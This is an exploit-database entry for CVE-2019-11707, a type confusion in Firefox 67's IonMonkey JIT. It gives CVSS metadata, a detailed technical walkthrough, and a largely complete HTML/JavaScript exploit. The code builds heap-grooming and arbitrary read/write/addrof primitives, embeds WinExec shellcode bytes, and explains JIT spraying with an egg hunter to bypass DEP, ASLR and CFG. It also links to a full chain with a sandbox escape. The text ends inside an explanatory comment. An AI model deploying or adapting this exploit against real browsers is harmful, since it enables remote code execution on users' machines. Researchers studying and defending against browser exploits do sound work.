Lucene search

K
zdtForrest Orr1337DAY-ID-37293
HistoryFeb 02, 2022 - 12:00 a.m.

Mozilla Firefox 67 - Array.pop JIT Type Confusion Exploit

2022-02-0200:00:00
Forrest Orr
0day.today
764

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

10

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.4

Confidence

High

EPSS

0.782

Percentile

98.3%

# Exploit Title: Mozilla Firefox 67 - Array.pop JIT Type Confusion
# Type: RCE
# Platform: Windows
# Exploit Author: deadlock (Forrest Orr)
# Author Homepage: https://forrest-orr.net
# Vendor Homepage: https://www.mozilla.org/en-US/
# Software Link: https://ftp.mozilla.org/pub/firefox/releases/65.0.1/win64/en-US/
# Version: Firefox 67.0.2 64-bit and earlier
# Tested on: Windows 10 x64
# CVE: CVE-2019-11707
# Bypasses: DEP, High Entropy ASLR, CFG
# Full Hydseven exploit chain with sandbox escape (CVE-2019-11708): https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven

<html>
<head>
</head>
<body>
<script>
/*
  _______ ___ ___ _______        _______ _______ _____ _______        _____ _____ _______ _______ _______ 
 |   _   |   Y   |   _   |______|       |   _   | _   |   _   |______| _   | _   |   _   |   _   |   _   |
 |.  1___|.  |   |.  1___|______|___|   |.  |   |.|   |   |   |______|.|   |.|   |___|   |.  |   |___|   |
 |.  |___|.  |   |.  __)_        /  ___/|.  |   `-|.  |\___   |      `-|.  `-|.  |  /   /|.  |   |  /   / 
 |:  1   |:  1   |:  1   |      |:  1  \|:  1   | |:  |:  1   |        |:  | |:  | |   | |:  1   | |   |  
 |::.. . |\:.. ./|::.. . |      |::.. . |::.. . | |::.|::.. . |        |::.| |::.| |   | |::.. . | |   |  
 `-------' `---' `-------'      `-------`-------' `---`-------'        `---' `---' `---' `-------' `---'  

Overview
                                 
This is a Windows variation of CVE-2019-11707, an exploit targetting a type
confusion bug in the Array.pop method during inlining/IonMonkey JIT compilation
of affected code in versions of Firefox up to 67.0.2.

Fundamentally this bug allows an attacker to trick IonMonkey into JIT'ing a
function popping and accessing an element of a specially crafted malicious
array without generating any speculative guards on the element type. In other
words, we can reliably produce an ASM routine for a JS function which is only
designed to handle array element access for a specific object type, while
allowing us to effectively modify the type of the element being accessed. Thus
a class object may be accessed as a float, a float as an integer, and so on.
The end result is a classic type confusion on the ASM layer which is leveraged
into an OOB array access, providing the basis for construction of R/W/AddressOf
primitives.

More specifically this bug allows for the creation of specially crafted malicious 
arrays with a specific element type set. By creating a function which loops
through this malicious array and calls Array.pop on its elements, IonMonkey
can be made to JIT an ASM routine specifically optimized to only handle this
one specific type of array element. The bug comes into affect in the unique
edge case of an object prototype: when Array.pop attempts to access an element
at an index which does not exist (such as in a sparse array) it will then make
a secondary, fall-back attempt to access this element index on the prototype
of its associated array. This would not be an issue if IonMonkey tracked
modifications to the type sets of prototype elements but it does not.

...

bool hasIndexedProperty;
MOZ_TRY_VAR(hasIndexedProperty, ArrayPrototypeHasIndexedProperty(this, script()));
if (hasIndexedProperty) {
    trackOptimizationOutcome(TrackedOutcome::ProtoIndexedProps);
    return InliningStatus_NotInlined;
    }

...

This was the vulnerable piece of code in IonMonkey which enabled the bug. It
can be plainly seen that they did attempt to check types of indexed elements
on array prototypes but did so incorrectly: every array will by default have a
special ArrayPrototype object associated with it. However, we do not need to
leave this default layout intact. We can set a custom prototype on our
malicious array (this custom prototype itself being an array) and trick the
engine into checking the ArrayPrototype of our custom prototype for indexed
elements instead of the custom prototype which contains the malicious untracked
elements. Practically speaking:

var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];

This will produce:

SparseTrapdoorArray -> ArrayPrototype

Now if a new array is created and set as the custom prototype of
SparseTrapdoorArray:

var CustomPrototype = [new Uint8Array(BugArrayBuf)];
SparseTrapdoorArray.__proto__ = CustomPrototype;

This will produce:

SparseTrapdoorArray -> CustomPrototype -> ArrayPrototype

Thus an element access on a non-existent element of SparseTrapdoorArray will
access this same index on CustomPrototype instead, and it will be the
ArrayPrototype of CustomPrototype which is checked by IonMonkey during
inlining, not the actual prototype of the SparseTrapdoorArray array ie. the
CustomPrototype. If SparseTrapdoorArray[0] were to not exist and be accessed,
it would result in an access to the Uint8Array element at CustomPrototype[0]
despite the JIT'd function being optimized for access to Uint32Array at 
SparseTrapdoorArray[0].

~

Design

I created the exploit primitives for CVE-2019-11707 in much the same way as I
did CVE-2019-17026: the heap is groomed so that 3 objects are lined up
in memory. In this case they are ArrayBuffers.

[ArrayBuffer 1][ArrayBuffer 2][ArrayBuffer 3]

We use the bug to overflow array 1 and corrupt the ArrayBuffer of array 2,
artificially augmenting its length to encompass the NativeObject of array 3.
From this point onward, array 2 is used to corrupt the slots pointer within the
NativeObject of array 3 to do arbitrary reads, writes and addrof. 

Once these primitives are obtained, a JIT spray is used to plant an egg hunter
shellcode in +RX memory within the firefox.exe content process being hijacked.
The ASM source for my egg hunter can be found here:
https://github.com/forrest-orr/Exploits/blob/main/Payloads/Source/DoubleStar/Stage1_EggHunter/Egghunter64.asm

The role of this egg hunter is to search out a magic QWORD in memory prefixing
an arbitrary shellcode (in this case a WinExec shellcode) stored as a
Uint8Array somewhere in this content process, disable DEP on it, and execute
it via a branch instruction.

The JIT code pointer of the JIT sprayed function is identified by using the
arbitrary read/addrof primitives to walk its JitInfo struct, and then a
secondary egg hunter within the JS itself is used to scan this JIT'd region for
the JIT sprayed egg hunter shellcode itself, stored as a double float array and
implanted at the end of the JIT'd ASM. Once this array is found, the JIT code
pointer is modified to point to it, and the JIT sprayed function is run one 
last time, resulting in the WinExec shellcode being found in memory, set to
executable and executed.

~

Sandboxing

The lineage of the Firefox application involves a Medium Integrity AppContainer
firefox.exe "parent" process which is responsible for making network
connections and handling the UI, with a set of Low Integrity child/content
firefox.exe processes beneath it, each locked to a specific domain (in the past
it was one process per tab, now its one process per site) and responsible for
parsing and potentially compiling/executing Javascript.

The exploit in this source file is only able to compromise the child/content
process. These processes are heavily sandboxed, and are not able to make network
connections, perform (almost) any file I/O, launch processes, or affect the UI.
This means that by default, neither WinExec or MessageBox shellcodes will work
in this exploit.

For an example of how the child/content process sandbox may be escaped via a
secondary exploit, see either my Hydseven or Double Star exploit chains:
https://github.com/forrest-orr/Exploits/tree/main/Chains/Hydseven
https://github.com/forrest-orr/DoubleStar

In the case of this standalone exploit, in order to be able to see the affect
of a successful payload execution post-exploitation, you must adjust the
security.sandbox.content.level in the "about:config" down from 5 to atleast 2.

~

Credits

0vercl0k  - for the original research/analysis of CVE-2019-11708 and reverse
            engineering of xul.dll for "god mode" patching.
			
sherl0ck  - for his writeup on CVE-2019-11707.

*/

////////
////////
// Global helpers/settings
////////

const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3,  ]);
var JITIterations = 10000; // Number of iterations needed to trigger JIT compilation of code. The compilation count threshold varies and this is typically overkill (10+ or 1000+ is often sufficient) but is the most stable count I've tested.
var HelperBuf = new ArrayBuffer(8);
var HelperDbl = new Float64Array(HelperBuf);
var HelperDword = new Uint32Array(HelperBuf);
var HelperWord = new Uint16Array(HelperBuf);

var OverflowArrays = []
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20)); // <- Overflow from here
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));
OverflowArrays.push(new ArrayBuffer(0x20));

var BugArrayBuf = OverflowArrays[5];
var CorruptedArrayBuf = OverflowArrays[6];
var MutableArray = OverflowArrays[7];
var BugArrayUint32 = new Uint32Array(BugArrayBuf);
var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];

////////
////////
// Debug/timer code
////////

const EnableDebug = false;
const EnableTimers = false;
const AlertOutput = true;
var TimeStart;
var ReadCount;

function StartTimer() {
    ReadCount = 0;
    TimeStart = new Date().getTime();
}

function EndTimer(Message) {
    var TotalTime = (new Date().getTime() - TimeStart);
    
    if(EnableTimers) {
        if(AlertOutput) {
            alert("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
        }
        else {
            console.log("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
        }
    }
}

function DebugLog(Message) {
    if(EnableDebug) {
        if(AlertOutput) {
            alert(Message);
        }
        else {
            console.log(Message); // In IE, console only works if devtools is open.
        }
    }
}

/*//////
////////
// JIT bug logic/initialization
////////

What follows is the machine code generated by IonMonkey for the bugged JS function.

0000014FA8BC7CA0 | 48:83EC 20               | sub rsp,20                              |
0000014FA8BC7CA4 | 48:8B4424 40             | mov rax,qword ptr ss:[rsp+40]           |
0000014FA8BC7CA9 | 48:C1E8 2F               | shr rax,2F                              |
0000014FA8BC7CAD | 3D F3FF0100              | cmp eax,1FFF3                           |
0000014FA8BC7CB2 | 0F85 E3020000            | jne 14FA8BC7F9B                         |
0000014FA8BC7CB8 | 48:8B4424 48             | mov rax,qword ptr ss:[rsp+48]           |
0000014FA8BC7CBD | 48:C1E8 2F               | shr rax,2F                              |
0000014FA8BC7CC1 | 3D F1FF0100              | cmp eax,1FFF1                           |
0000014FA8BC7CC6 | 0F85 CF020000            | jne 14FA8BC7F9B                         |
0000014FA8BC7CCC | E9 04000000              | jmp 14FA8BC7CD5                         |
0000014FA8BC7CD1 | 48:83EC 20               | sub rsp,20                              |
0000014FA8BC7CD5 | 49:BB 785F225A7F000000   | mov r11,7F5A225F78                      |
...
0000014FA8BC7EBC | 49:8961 70               | mov qword ptr ds:[r9+70],rsp            |
0000014FA8BC7EC0 | 6A 00                    | push 0                                  |
0000014FA8BC7EC2 | 4C:8BCC                  | mov r9,rsp                              |
0000014FA8BC7EC5 | 48:83E4 F0               | and rsp,FFFFFFFFFFFFFFF0                |
0000014FA8BC7EC9 | 41:51                    | push r9                                 |
0000014FA8BC7ECB | 48:83EC 28               | sub rsp,28                              |
0000014FA8BC7ECF | E8 4C020000              | call 14FA8BC8120                        |
0000014FA8BC7ED4 | 48:83C4 28               | add rsp,28                              |
0000014FA8BC7ED8 | 5C                       | pop rsp                                 |
0000014FA8BC7ED9 | A8 FF                    | test al,FF                              |
0000014FA8BC7EDB | 0F84 2F020000            | je 14FA8BC8110                          |
0000014FA8BC7EE1 | 48:8B4C24 20             | mov rcx,qword ptr ss:[rsp+20]           |
0000014FA8BC7EE6 | 0FAEE8                   | lfence                                  |
0000014FA8BC7EE9 | 48:83C4 28               | add rsp,28                              |
0000014FA8BC7EED | 4C:8BD9                  | mov r11,rcx                             |
0000014FA8BC7EF0 | 49:C1EB 2F               | shr r11,2F                              |
0000014FA8BC7EF4 | 41:81FB FCFF0100         | cmp r11d,1FFFC                          |
0000014FA8BC7EFB | 0F85 E5010000            | jne 14FA8BC80E6                         |
0000014FA8BC7F01 | 48:B8 000000000000FEFF   | mov rax,FFFE000000000000                |
0000014FA8BC7F0B | 48:33C1                  | xor rax,rcx                             |
0000014FA8BC7F0E | 33D2                     | xor edx,edx                             |
0000014FA8BC7F10 | 49:BB F02DB75C7F000000   | mov r11,7F5CB72DF0                      |
0000014FA8BC7F1A | 4C:3918                  | cmp qword ptr ds:[rax],r11              |
0000014FA8BC7F1D | 0F85 CA010000            | jne 14FA8BC80ED                         |
0000014FA8BC7F23 | 48:0F45C2                | cmovne rax,rdx                          |
0000014FA8BC7F27 | 8B48 28                  | mov ecx,dword ptr ds:[rax+28]           |
0000014FA8BC7F2A | 48:8B40 38               | mov rax,qword ptr ds:[rax+38]           |
0000014FA8BC7F2E | 8B5424 1C                | mov edx,dword ptr ss:[rsp+1C]           |
0000014FA8BC7F32 | 45:33DB                  | xor r11d,r11d                           |
0000014FA8BC7F35 | 3BD1                     | cmp edx,ecx                             |
0000014FA8BC7F37 | 0F83 0B000000            | jae 14FA8BC7F48                         |
0000014FA8BC7F3D | 41:0F43D3                | cmovae edx,r11d                         |
0000014FA8BC7F41 | C70490 80000000          | mov dword ptr ds:[rax+rdx*4],80         | <- Type confusion: IonMonkey JIT'd an index access for Uint32Array with a DWORD operand. By confusing the type with Uint8Array we can pass the boundscheck and corrupt 32-bits out of bounds with the SIB of this instruction
0000014FA8BC7F48 | 48:B9 000000000080F9FF   | mov rcx,FFF9800000000000                |
0000014FA8BC7F52 | 33C0                     | xor eax,eax                             |
0000014FA8BC7F54 | 8B5424 1C                | mov edx,dword ptr ss:[rsp+1C]           |
0000014FA8BC7F58 | 49:BB 545F225A7F000000   | mov r11,7F5A225F54                      |
0000014FA8BC7F62 | 41:833B 00               | cmp dword ptr ds:[r11],0                |
0000014FA8BC7F66 | 0F85 88010000            | jne 14FA8BC80F4                         |
0000014FA8BC7F6C | 3D 00000100              | cmp eax,10000                           |
0000014FA8BC7F71 | 0F8D 05000000            | jge 14FA8BC7F7C                         |
0000014FA8BC7F77 | 83C0 01                  | add eax,1                               |
0000014FA8BC7F7A | EB DC                    | jmp 14FA8BC7F58                         |
0000014FA8BC7F7C | 48:83C4 20               | add rsp,20                              |
0000014FA8BC7F80 | C3                       | ret                                     |                                                                                 
*/

function BuggedJITFunc(Index) {
    if (SparseTrapdoorArray.length == 0) {
        SparseTrapdoorArray[1] = BugArrayUint32; // Convert target array to a sparse array, being careful to preserve the type set: if it were to change, IonMonkey will de-optimize this function back to bytecode
    }

    const Uint32Obj = SparseTrapdoorArray.pop();
    Uint32Obj[Index] = 0x80; // This will be an OOB index access which will fail its boundscheck prior to being confused with a Uint8Array
    for (var i = 0; i < JITIterations; i++) {} // JIT compile this function
}

var CustomPrototype = [new Uint8Array(BugArrayBuf)]; // When IonMonkey JITs the bug function it will not check the type set of this custom prototype, only its ArrayPrototype. Only one element is needed since the sparse array access will be at index 0
SparseTrapdoorArray.__proto__ = CustomPrototype;

// In theory only 3 should be needed but it never works with 3, always works with 4.
for (var i = 0; i < 4; i++) { // The function JITs itself, this iteration count is what is required to empty out the array, make it sparse, and then make the type confusion access
    BuggedJITFunc(18); // 18*4 = 0x48: CorruptedArray.NativeObject.SlotsPtr
    
/*
ArrayBuffer in memory:
    
                  +-> group                +->shape
                  |                        |
0x7f8e13a88280:  0x00007f8e13a798e0  0x00007f8e13aa1768

                  +-> slots                +->elements (Empty in this case)
                  |                        |
0x7f8e13a88290:  0x0000000000000000  0x000055d6ee8ead80

                  +-> Shifted pointer
                  |   pointing to          +-> size in bytes of the data buffer
                  |   data buffer          |
0x7f8e13a882a0:  0x00003fc709d44160  0xfff8800000000020

                  +-> Pointer
                  |   pointing to          +-> flags
                  |   first view           |
0x7f8e13a882b0:  0xfffe7f8e15e00480  0xfff8800000000000
*/
}

// Initialize mutable array properties for R/W/AddressOf primitives. Use these specific values so that it can later be verified whether slots pointer modifications have been successful.

MutableArray.x = 5.40900888e-315; // Most significant bits are 0 - no tag, allows an offset of 4 to be treated as a double
MutableArray.y = 0x41414141;
MutableArray.z = 0; // Least significant bits are 0 - offset of 4 means that y will be treated as a double

var CorruptedClone = new Uint8Array(OverflowArrays[6]);

function LeakSlotsPtr() {
    var SavedSlotsPtrBytes = CorruptedClone.slice(0x30, 0x38);
    var LeakedSlotsPtrDbl = new Float64Array(SavedSlotsPtrBytes.buffer);
    return LeakedSlotsPtrDbl;
}

function SetSlotsPtr(NewSlotsPtrDbl) {
    HelperDbl[0] = NewSlotsPtrDbl;
    
    for(var i = 0; i < 8; i++) {
        var Temp = new Uint8Array(HelperBuf);
        CorruptedClone[0x30 + i] = Temp[i];
    }
}

/*//////
////////
// Exploit primitives
///////*/

function WeakLeakDbl(TargetAddress) {
    var SavedSlotsPtrDbl = LeakSlotsPtr();
    SetSlotsPtr(TargetAddress);
    var LeakedDbl = MutableArray.x;
    SetSlotsPtr(SavedSlotsPtrDbl);
    return LeakedDbl;
}

function WeakWriteDbl(TargetAddress, Val) { 
    var SavedSlotsPtrDbl = LeakSlotsPtr();
    SetSlotsPtr(TargetAddress);
    MutableArray.x = Val;
    SetSlotsPtr(SavedSlotsPtrDbl);
}

function WeakLeakObjectAddress(Obj) {
    //                                             x                       y                        z
    // MutableArray.NativeObj.SlotsPtr -> [0x????????????????] | [Target object address] | [0x????????????????]
    MutableArray.y = Obj;

    //                                             x                       y                        z
    // MutableArray.NativeObj.SlotsPtr -> [0x????????Target o] | [bject adress????????] | [0x????????????????]
    
    var SavedSlotsPtrDbl = LeakSlotsPtr();
    HelperDbl[0] = SavedSlotsPtrDbl;
    HelperDword[0] = HelperDword[0] + 4;
    SetSlotsPtr(HelperDbl[0]);
    
    // Patch together a double of the target object address from the two 32-bit property values
    
    HelperDbl[0] = MutableArray.x;
    var LeakedLow = HelperDword[1];
    HelperDbl[0] = MutableArray.y; // Works in release, not in debug (assertion issues)
    var LeakedHigh = HelperDword[0] & 0x00007fff; // Filter off tagged pointer bits
    SetSlotsPtr(SavedSlotsPtrDbl);
    HelperDword[0] = LeakedLow;
    HelperDword[1] = LeakedHigh;
    
    return HelperDbl[0];
}

var ExplicitDwordArray = new Uint32Array(1);
var ExplicitDwordArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
var ExplicitDblArray = new Float64Array(1);
var ExplicitDblArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read

function InitStrongRWPrimitive() {
    // Leak data view pointers from the typed arrays
    
    HelperDbl[0] = WeakLeakObjectAddress(ExplicitDblArray);
    HelperDword[0] = HelperDword[0] + 0x38; // Float64Array data view pointer (same as ArrayBuffer)
    ExplicitDblArrayDataPtr = HelperDbl[0];
    
    HelperDbl[0] = WeakLeakObjectAddress(ExplicitDwordArray);
    HelperDword[0] = HelperDword[0] + 0x38; // Uint32Array data view pointer (same as ArrayBuffer)
    ExplicitDwordArrayDataPtr = HelperDbl[0];
    
    HelperDbl[0] = WeakLeakDbl(HelperDbl[0]); // In the event initialization failed, the first read will return the initial marker data in the x y and z slots of the MutableArray
    
    if(HelperDword[0] == 0x41414141) {
        DebugLog("Arbitrary read primitive failed");
        window.location.reload();
        return 0.0;
    }
}

function StrongLeakDbl(TargetAddress) {
    WeakWriteDbl(ExplicitDblArrayDataPtr, TargetAddress);
    return ExplicitDblArray[0];
}

function StrongWriteDword(TargetAddress, Value) {
    WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
    ExplicitDwordArray[0] = Value;
}

function StrongLeakDword(TargetAddress){
    WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
    return ExplicitDwordArray[0];
}

function GetJSFuncJITInfoPtr(JSFuncObj) {
    HelperDbl[0] = WeakLeakObjectAddress(JSFuncObj); // The JSFunction object address associated with the (now JIT compiled) shellcode data.
    HelperDword[0] = HelperDword[0] + 0x30; // JSFunction.u.native.extra.jitInfo_ contains a pointer to the +RX JIT region at offset 0 of its struct.
    var JITInfoAddress = WeakLeakDbl(HelperDbl[0]);
    return JITInfoAddress;
}

function GetJSFuncJITCodePtr(JSFuncObj) {
    var JITInfoAddress = GetJSFuncJITInfoPtr(JSFuncObj);
    
    if(JITInfoAddress) {
        var JITCodePtr = WeakLeakDbl(JITInfoAddress); // Leak the address to the compiled JIT assembly code associated with the JIT'd shellcode function from its JitInfo struct (it is a pointer at offset 0 of this struct)
        return JITCodePtr;
    }
    
    return 0.0;
}

/*//////
////////
// JIT spray/egghunter shellcode logic
////////

JIT spray in modern Firefox 64-bit on Windows seems to behave very differently
when a special threshold of 100 double float constants are planted into a single
function and JIT sprayed. When more than 100 are implanted, the JIT code pointer
for the JIT sprayed function will look as follows:

00000087EB6F5280 | E9 23000000              | jmp 87EB6F52A8                   <- JIT code pointer for JIT sprayed function points here
00000087EB6F5285 | 48:B9 00D0F2F8F1000000   | mov rcx,F1F8F2D000                   
00000087EB6F528F | 48:8B89 60010000         | mov rcx,qword ptr ds:[rcx+160]       
00000087EB6F5296 | 48:89A1 D0000000         | mov qword ptr ds:[rcx+D0],rsp        
00000087EB6F529D | 48:C781 D8000000 0000000 | mov qword ptr ds:[rcx+D8],0          
00000087EB6F52A8 | 55                       | push rbp                             
00000087EB6F52A9 | 48:8BEC                  | mov rbp,rsp                          
00000087EB6F52AC | 48:83EC 48               | sub rsp,48                           
00000087EB6F52B0 | C745 E8 00000000         | mov dword ptr ss:[rbp-18],0          
...
00000087EB6F5337 | 48:BB 4141414100000000   | mov rbx,41414141                 <- Note the first double float being loaded into RBX        
00000087EB6F5341 | 53                       | push rbx                             
00000087EB6F5342 | 49:BB D810EAFCF1000000   | mov r11,F1FCEA10D8                   
00000087EB6F534C | 49:8B3B                  | mov rdi,qword ptr ds:[r11]           
00000087EB6F534F | FF17                     | call qword ptr ds:[rdi]              
00000087EB6F5351 | 48:83C4 08               | add rsp,8                            
00000087EB6F5355 | 48:B9 40807975083D0000   | mov rcx,3D0875798040                 
00000087EB6F535F | 49:BB E810EAFCF1000000   | mov r11,F1FCEA10E8                   
00000087EB6F5369 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]           
00000087EB6F536C | FF17                     | call qword ptr ds:[rdi]              
00000087EB6F536E | 48:BB 9090554889E54883   | mov rbx,8348E58948559090             
00000087EB6F5378 | 53                       | push rbx                             
00000087EB6F5379 | 49:BB F810EAFCF1000000   | mov r11,F1FCEA10F8              
00000087EB6F5383 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]           
00000087EB6F5386 | FF17                     | call qword ptr ds:[rdi]              
00000087EB6F5388 | 48:83C4 08               | add rsp,8                            
00000087EB6F538C | 48:B9 40807975083D0000   | mov rcx,3D0875798040                 
00000087EB6F5396 | 49:BB 0811EAFCF1000000   | mov r11,F1FCEA1108              
00000087EB6F53A0 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]           
00000087EB6F53A3 | FF17                     | call qword ptr ds:[rdi]                              
...

Rather than implanting the double float constants into the JIT'd code region as
an array of raw constant data, the JIT engine has created a (very large) quantity
of code which manually handles each individual double float one by one (this code
goes on much further than I have pasted here). You can see this at:

00000087EB6F5337 | 48:BB 4141414100000000   | mov rbx,41414141  

This is the first double float 5.40900888e-315 (the stage one shellcode egg)
being loaded into RBX, where each subsequent double is treated the same.

